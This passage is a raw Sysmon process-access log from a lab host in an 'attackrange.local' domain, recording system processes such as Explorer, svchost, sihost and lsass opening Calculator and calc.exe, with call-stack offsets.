Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360293Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360292Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360291Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360290Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7d4e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ca7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+299b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f
10341000x8000000000000000360289Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337a-6013-7402-000000001100}62682592C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\usermgrcli.dll+112d|C:\Windows\system32\activationmanager.dll+f9dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e
10341000x8000000000000000360288Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360287Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+33e55|C:\Windows\SYSTEM32\psmserviceexthost.dll+11fea|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360286Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+4988e|C:\Windows\system32\twinui.pcshell.dll+4b3da|C:\Windows\system32\twinui.pcshell.dll+38af2|C:\Windows\system32\twinui.pcshell.dll+6fe9c|C:\Windows\System32\shcore.dll+b0b7|C:\Windows\system32\twinui.pcshell.dll+1dc45|C:\Windows\system32\twinui.pcshell.dll+623cb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931
10341000x8000000000000000360285Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3d710|C:\Windows\system32\twinui.pcshell.dll+11673|C:\Windows\system32\twinui.pcshell.dll+104e1|C:\Windows\system32\twinui.pcshell.dll+70eab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2
10341000x8000000000000000360284Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337a-6013-7402-000000001100}62681424C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\activationmanager.dll+cd0b|C:\Windows\system32\activationmanager.dll+c217|C:\Windows\system32\activationmanager.dll+bd76|C:\Windows\system32\activationmanager.dll+129de|C:\Windows\system32\activationmanager.dll+25a83|C:\Windows\system32\activationmanager.dll+9593|C:\Windows\system32\activationmanager.dll+54b7|C:\Windows\system32\activationmanager.dll+4591|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8
10341000x8000000000000000360283Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.639{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360282Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.639{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360281Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.639{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360280Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360279Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360278Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360277Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360276Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360275Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360274Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360273Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
